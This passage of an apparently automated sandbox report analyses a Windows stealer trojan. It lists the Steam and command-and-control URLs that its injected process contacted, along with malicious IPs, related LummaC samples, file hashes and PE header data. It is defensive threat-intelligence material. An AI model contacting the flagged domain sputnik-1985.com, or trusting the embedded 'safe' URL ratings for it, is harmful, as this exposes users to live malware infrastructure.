                                                                                                                                          https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&amp;l=engBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            https://sputnik-1985.com/BitLockerToGo.exe, 00000004.00000003.2847490722.00000000031B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://sputnik-1985.com/8=lwBitLockerToGo.exe, 00000004.00000002.2859405148.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2858201528.0000000003151000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857591004.000000000314F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            		unknown
                                                                                                                                            https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&amp;l=english&amBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              https://www.google.com/recaptcha/BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                https://checkout.steampowered.com/BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  https://sputnik-1985.com/apiobHBitLockerToGo.exe, 00000004.00000003.2847490722.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000002.2859529654.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820794733.00000000031A4000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2857839635.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.000000000319D000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834367059.00000000031A4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  		unknown
                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    https://store.steampowered.com/;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://www.opengis.net/gmlhttp://xmlns.com/foaf/0.1/integerNjFiIQNSid.exefalse
                                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                                      		unknown
                                                                                                                                                      https://store.steampowered.com/about/BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        https://community.fasBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                        		unknown
                                                                                                                                                        https://steamcommunity.com/my/wishlist/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&amp;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            https://help.steampowered.com/en/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                              		high
                                                                                                                                                              https://steamcommunity.com/market/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                		high
                                                                                                                                                                https://store.steampowered.com/news/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  		high
                                                                                                                                                                  https://community.fastly.steamstatic.coBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                    		high
                                                                                                                                                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=BitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      		high
                                                                                                                                                                      http://store.steampowered.com/subscriber_agreement/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                        		high
                                                                                                                                                                        https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          		high
                                                                                                                                                                          https://recaptcha.net/recaptcha/;BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://steamcommunity.com/discussions/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://community.fastly.steamstatYBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://store.steampowered.com/stats/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&amBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  http://backend.userland.com/creativeCommonsRssModulehttp://madskills.com/public/xml/rss/module/pingbNjFiIQNSid.exefalse
                                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                                  		unknown
                                                                                                                                                                                  https://medal.tvBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                    		high
                                                                                                                                                                                    https://broadcast.st.dl.eccdnx.comBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      		high
                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.pngBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        		high
                                                                                                                                                                                        https://sputnik-1985.com/-BitLockerToGo.exe, 00000004.00000003.2834241377.00000000031B4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                                        		unknown
                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&amp;l=english&aBitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                          		high
                                                                                                                                                                                          https://store.steampowered.com/steam_refunds/BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                            		high
                                                                                                                                                                                            http://x1.c.lencr.org/0BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                              		high
                                                                                                                                                                                              http://x1.i.lencr.org/0BitLockerToGo.exe, 00000004.00000003.2799863216.00000000054FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                		high
                                                                                                                                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchBitLockerToGo.exe, 00000004.00000003.2775147988.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2775052601.0000000005489000.00000004.00000800.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2774980988.000000000548C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  		high
                                                                                                                                                                                                  https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&aBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.000000000310B000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    		high
                                                                                                                                                                                                    https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      		high
                                                                                                                                                                                                      https://community.fastly.steamstatic.com/public/javascript/reportiBitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2834241377.000000000314F000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2820648610.0000000003194000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2847490722.0000000003194000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                        		high
                                                                                                                                                                                                        https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016BitLockerToGo.exe, 00000004.00000003.2762647399.000000000319E000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762672763.00000000031A6000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          		high
                                                                                                                                                                                                          https://sputnik-1985.com/api3BitLockerToGo.exe, 00000004.00000003.2773332306.0000000003152000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000004.00000003.2762693866.0000000003150000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                                          		unknown

                                                                                                                                                                                                          World Map of Contacted IPs

                                                                                                                                                                                                          • No. of IPs < 25%
                                                                                                                                                                                                          • 25% < No. of IPs < 50%
                                                                                                                                                                                                          • 50% < No. of IPs < 75%
                                                                                                                                                                                                          • 75% < No. of IPs

                                                                                                                                                                                                          Public IPs

                                                                                                                                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                          104.21.112.1
                                                                                                                                                                                                          		sputnik-1985.comUnited States
                                                                                                                                                                                                          		13335CLOUDFLARENETUStrue
                                                                                                                                                                                                          104.102.49.254
                                                                                                                                                                                                          		steamcommunity.comUnited States
                                                                                                                                                                                                          		16625AKAMAI-ASUSfalse

                                                                                                                                                                                                          General Information

                                                                                                                                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                                          Analysis ID:1585134
                                                                                                                                                                                                          Start date and time:2025-01-07 06:00:14 +01:00
                                                                                                                                                                                                          Joe Sandbox product:CloudBasic
                                                                                                                                                                                                          Overall analysis duration:0h 5m 52s
                                                                                                                                                                                                          Hypervisor based Inspection enabled:false
                                                                                                                                                                                                          Report type:full
                                                                                                                                                                                                          Cookbook file name:default.jbs
                                                                                                                                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                                          Number of analysed new started processes analysed:6
                                                                                                                                                                                                          Number of new started drivers analysed:0
                                                                                                                                                                                                          Number of existing processes analysed:0
                                                                                                                                                                                                          Number of existing drivers analysed:0
                                                                                                                                                                                                          Number of injected processes analysed:0
                                                                                                                                                                                                          Technologies:
                                                                                                                                                                                                          • HCA enabled
                                                                                                                                                                                                          • EGA enabled
                                                                                                                                                                                                          • AMSI enabled
                                                                                                                                                                                                          Analysis Mode:default
                                                                                                                                                                                                          Analysis stop reason:Timeout
                                                                                                                                                                                                          Sample name:NjFiIQNSid.exe
                                                                                                                                                                                                          renamed because original name is a hash value
                                                                                                                                                                                                          Original Sample Name:49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7.exe
                                                                                                                                                                                                          Detection:MAL
                                                                                                                                                                                                          Classification:mal100.troj.spyw.evad.winEXE@3/0@11/2
                                                                                                                                                                                                          EGA Information:
                                                                                                                                                                                                          • Successful, ratio: 50%
                                                                                                                                                                                                          HCA Information:
                                                                                                                                                                                                          • Successful, ratio: 91%
                                                                                                                                                                                                          • Number of executed functions: 34
                                                                                                                                                                                                          • Number of non-executed functions: 118
                                                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                                                          • Found application associated with file extension: .exe

                                                                                                                                                                                                          Warnings

                                                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                                          • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                                          • Execution Graph export aborted for target NjFiIQNSid.exe, PID 6920 because there are no executed function
                                                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                                          • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                                          Simulations

                                                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                                                          00:01:52API Interceptor9x Sleep call for process: BitLockerToGo.exe modified

                                                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                                                          IPs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          104.21.112.1SH8ZyOWNi2.exeGet hashmaliciousCMSBruteBrowse
                                                                                                                                                                                                          • beammp.com/phpmyadmin/
                                                                                                                                                                                                          104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                                          • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                                          http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • www.valvesoftware.com/legal.htm

                                                                                                                                                                                                          Domains

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          steamcommunity.comZxSWvC0Tz7.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          176.113.115.170.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          KRNL.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Gz1bBIg2Tw.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          OXoeX1Ii3x.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Exlan_setup_v3.1.2.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          Bootstrapper.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254

                                                                                                                                                                                                          ASNs

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          AKAMAI-ASUSw3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.49.251.7
                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.57.90.149
                                                                                                                                                                                                          malware.batGet hashmaliciousPureLog Stealer, RHADAMANTHYSBrowse
                                                                                                                                                                                                          • 184.28.90.27
                                                                                                                                                                                                          https://www.scribd.com/document/787929982/script-tlsfranceGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.34.86
                                                                                                                                                                                                          Fantazy.x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.44.181.15
                                                                                                                                                                                                          Fantazy.m68k.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 95.101.191.171
                                                                                                                                                                                                          Fantazy.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 104.76.15.30
                                                                                                                                                                                                          momo.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 95.101.248.33
                                                                                                                                                                                                          z0r0.x86.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 23.51.98.56
                                                                                                                                                                                                          armv6l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 23.75.90.11
                                                                                                                                                                                                          CLOUDFLARENETUSH565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.74.191
                                                                                                                                                                                                          MV DESPINA_VESSEL_DESCRIPTION.doc.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          https://u896278.ct.sendgrid.net/ls/click?upn=u001.qpi-2F0q-2FpcJZ7AGoG9N-2BrxLxoGn8scq-2BedBfmGHFAiwRCk-2Fciku7nsS3YfQMNNJI09mLo_nYx4-2F6dkZkjW10KMIp5mXhxys1ng1sBiI-2Bi9ROMYt6d5xhIh5rIqEUIaIxVHh8-2Ftz-2FouCgfXZk6mMUe2uKm92SOgBLlBdhjnRJuhENZnIuGoEoPqnROi7OCzdabJBBnGjEwd2iK-2BngR2RyIIgM3XrJQ7wQhHrfqScifSW3iAsv3H5nGFK9ntcSdChvkxj0yXdE-2FQ0ICDszl57i6aZSB-2Fow-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.26.0.123
                                                                                                                                                                                                          FORTUNE RICH_PARTICULARS.pdf.scr.exeGet hashmaliciousMassLogger RATBrowse
                                                                                                                                                                                                          • 188.114.97.3
                                                                                                                                                                                                          https://report-scam.malwarebouncer.com/XcUR2TnV2VTlXT0s0Z0NYa01KSGt3dUtWMWNiblBrc29mMlpZUU1WdThBSjdDdTlRQTVDV1ZZd0pDeWRmUU5rQ1QvVDNiSlBNYWd2bTd0eTRkZW5jT0hrYTBKWHFiVUc4TVZBOGpiNkh4VG9OTm9zNTVUWHNmNWVydHpqbzhIc1llSzdzTHZ0dENVNWRLZy9BbCsyVDRMSGRHOThUWnV5QUxPU0RZL1dPalNYTmUzMTVoRzl5bmk1ZVZRPT0tLUdVYnJkMC9GazI3MWlxYmotLUpFOURyOWkzK1l6Vy9BYTVOVDBVNkE9PQ==?cid=2346401253Get hashmaliciousKnowBe4Browse
                                                                                                                                                                                                          • 104.17.25.14
                                                                                                                                                                                                          x86_64.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 8.44.60.50
                                                                                                                                                                                                          sh4.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                          • 162.158.206.216
                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.80.52
                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.21.80.52
                                                                                                                                                                                                          https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                          • 188.114.96.3

                                                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                          a0e9f5d64349fb13191bc781f81f42e1H565rymIuO.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          w3245.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          sEG2xXpg0X.xlsmGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          Drivespan.dllGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          installer_1.05_36.8.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          SET_UP.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          anrek.mp4.htaGet hashmaliciousLummaC StealerBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1
                                                                                                                                                                                                          title.mp4.htaGet hashmaliciousLummaC, PureLog Stealer, zgRATBrowse
                                                                                                                                                                                                          • 104.102.49.254
                                                                                                                                                                                                          • 104.21.112.1

                                                                                                                                                                                                          Dropped Files

                                                                                                                                                                                                          No context

                                                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                                                          No created / dropped files found

                                                                                                                                                                                                          Static File Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                          Entropy (8bit):6.4529386516648986
                                                                                                                                                                                                          TrID:
                                                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                          File name:NjFiIQNSid.exe
                                                                                                                                                                                                          File size:6'870'528 bytes
                                                                                                                                                                                                          MD5:29ca15934b67b18a91254ce253a588ca
                                                                                                                                                                                                          SHA1:05dfc5bb1df62ca212e1c8adf5af4542f7ad8b78
                                                                                                                                                                                                          SHA256:49615905016fb4de6a3b50d12979b1076eca6bc539d9bcbf2ed338b6b2299cc7
                                                                                                                                                                                                          SHA512:f9d961bb6a1dcfb371fd50aa94d8aac60b0de3cef813ec8bb9003ca202b3d6c3611a526ed890583ce0c401ca79ea8088189ba0fd7e3ce3d47a9e159164e9571e
                                                                                                                                                                                                          SSDEEP:196608:W2J2evtYNFkAvMzhj2F019IxNGqXzIYK:PztYNFkAvMzhj2F019IxNGqXi
                                                                                                                                                                                                          TLSH:44664B90F9DB44F6EA03193048A7A27F17346E068F24CBCBDA507F59FC37AA10972659
                                                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.........h..........................N........_...@..........................0l...........@................................

                                                                                                                                                                                                          File Icon

                                                                                                                                                                                                          Icon Hash:00928e8e8686b000

                                                                                                                                                                                                          Static PE Info

                                                                                                                                                                                                          General

                                                                                                                                                                                                          Entrypoint:0x464ee0
                                                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE, DEBUG_STRIPPED
                                                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                          Time Stamp:0x0 [Thu Jan 1 00:00:00 1970 UTC]
                                                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                                                          OS Version Major:6
                                                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                                                          File Version Major:6
                                                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                                                          Subsystem Version Major:6
                                                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                                                          Import Hash:9cbefe68f395e67356e2a5d8d1b285c0

                                                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                                                          Instruction
                                                                                                                                                                                                          jmp 00007FBA84D59950h
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          int3
                                                                                                                                                                                                          mov ecx, dword ptr [esp+04h]
                                                                                                                                                                                                          sub esp, 28h
